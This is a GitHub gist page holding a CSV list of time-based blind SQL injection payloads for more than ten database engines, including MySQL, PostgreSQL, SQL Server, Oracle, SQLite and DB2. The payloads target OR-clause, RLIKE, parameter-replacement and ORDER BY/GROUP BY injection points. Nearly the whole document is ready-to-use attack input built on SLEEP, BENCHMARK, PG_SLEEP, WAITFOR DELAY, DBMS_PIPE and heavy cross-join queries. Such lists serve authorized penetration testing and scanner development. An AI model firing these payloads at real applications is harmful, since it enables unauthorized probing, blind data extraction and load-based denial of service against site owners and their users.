Skip to content

Instantly share code, notes, and snippets.

@win3zz

win3zz/time_blind_payloads.csv

Last active July 21, 2025 07:25
Show Gist options
  • Save win3zz/885cce81999776290243059bc4cd1116 to your computer and use it in GitHub Desktop.
Save win3zz/885cce81999776290243059bc4cd1116 to your computer and use it in GitHub Desktop.
Download ZIP
Time-based blind SQL Injection Payloads (Replace [SLEEPTIME] with actual time)
Raw
time_blind_payloads.csv
Title Payload
MySQL >= 5.0.12 OR time-based blind (query SLEEP) OR (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test)
MySQL >= 5.0.12 OR time-based blind (SLEEP) OR SLEEP([SLEEPTIME])
MySQL < 5.0.12 OR time-based blind (BENCHMARK) OR 1337=BENCHMARK([SLEEPTIME]000000,MD5('win3zz_test'))
MySQL > 5.0.12 OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
MySQL >= 5.0.12 RLIKE time-based blind RLIKE SLEEP([SLEEPTIME])
MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) RLIKE (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test)
MySQL OR time-based blind (ELT) OR ELT(1337=1337,SLEEP([SLEEPTIME]))
PostgreSQL > 8.1 OR time-based blind OR 1337=(SELECT 1337 FROM PG_SLEEP([SLEEPTIME]))
PostgreSQL OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
Microsoft SQL Server/Sybase time-based blind (IF) WAITFOR DELAY '0:0:[SLEEPTIME]'
Microsoft SQL Server/Sybase OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
Oracle OR time-based blind OR 1337=DBMS_PIPE.RECEIVE_MESSAGE('win3zz_test',[SLEEPTIME])
Oracle OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
IBM DB2 OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
SQLite > 2.0 OR time-based blind (heavy query) OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
Firebird >= 2.0 OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
SAP MaxDB OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
HSQLDB >= 1.7.2 OR time-based blind (heavy query) OR 'win3zz_test'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1337),0),[SLEEPTIME]000000000),NULL)
HSQLDB > 2.0 OR time-based blind (heavy query) OR 'win3zz_test'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
Informix OR time-based blind (heavy query) OR 1337=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
ClickHouse OR time-based blind (heavy query) OR 1337=(SELECT COUNT(fuzzBits('win3zz_test', 0.001)) FROM numbers(1000000))
MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) PROCEDURE ANALYSE(EXTRACTVALUE(1337,CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('win3zz_test'))))),1)
MySQL >= 5.0.12 time-based blind - Parameter replace (CASE WHEN (1337=1337) THEN SLEEP([SLEEPTIME]) ELSE 1337 END)
MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) (SELECT 1337 FROM (SELECT(SLEEP([SLEEPTIME])))win3zz_test)
MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK) (CASE WHEN (1337=1337) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('win3zz_test'))) ELSE 1337)
MySQL time-based blind - Parameter replace (bool) (1337=1337 AND SLEEP([SLEEPTIME]))
MySQL time-based blind - Parameter replace (ELT) ELT(1337=1337,SLEEP([SLEEPTIME]))
MySQL time-based blind - Parameter replace (MAKE_SET) MAKE_SET(1337=1337,SLEEP([SLEEPTIME]))
PostgreSQL > 8.1 time-based blind - Parameter replace (SELECT 1337 FROM PG_SLEEP([SLEEPTIME]))
PostgreSQL time-based blind - Parameter replace (heavy query) (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries) (SELECT (CASE WHEN (1337=1337) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1337 END))
Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP) BEGIN IF (1337=1337) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE) (SELECT (CASE WHEN (1337=1337) THEN DBMS_PIPE.RECEIVE_MESSAGE('win3zz_test',[SLEEPTIME]) ELSE 1337 END) FROM DUAL)
Oracle time-based blind - Parameter replace (heavy queries) (SELECT (CASE WHEN (1337=1337) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1337 END) FROM DUAL)
SQLite > 2.0 time-based blind - Parameter replace (heavy query) (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))
Firebird time-based blind - Parameter replace (heavy query) (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
SAP MaxDB time-based blind - Parameter replace (heavy query) (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
IBM DB2 time-based blind - Parameter replace (heavy query) (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query) (SELECT (CASE WHEN (1337=1337) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1337),0),[SLEEPTIME]00000000),NULL) ELSE 'win3zz_test' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
HSQLDB > 2.0 time-based blind - Parameter replace (heavy query) (SELECT (CASE WHEN (1337=1337) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE 'win3zz_test' END) FROM (VALUES(0)))
Informix time-based blind - Parameter replace (heavy query) (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)
MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause ,(SELECT (CASE WHEN (1337=1337) THEN SLEEP([SLEEPTIME]) ELSE 1337 END))
MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK) ,(SELECT (CASE WHEN (1337=1337) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('win3zz_test'))) ELSE 1337*(SELECT 1337 FROM mysql.db) END))
PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause ,(SELECT (CASE WHEN (1337=1337) THEN (SELECT 1337 FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query) ,(SELECT (CASE WHEN (1337=1337) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query) ,(SELECT (CASE WHEN (1337=1337) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1337*(SELECT 1337 UNION ALL SELECT [RANDNUM1]) END))
Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP) ,(BEGIN IF (1337=1337) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE) ,(SELECT (CASE WHEN (1337=1337) THEN DBMS_PIPE.RECEIVE_MESSAGE('win3zz_test',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query) ,(SELECT (CASE WHEN (1337=1337) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query) ,(SELECT (CASE WHEN (1337=1337) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1337),0),[SLEEPTIME]00000000),NULL))) ELSE 1337/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query) ,(SELECT (CASE WHEN (1337=1337) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE 1337/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment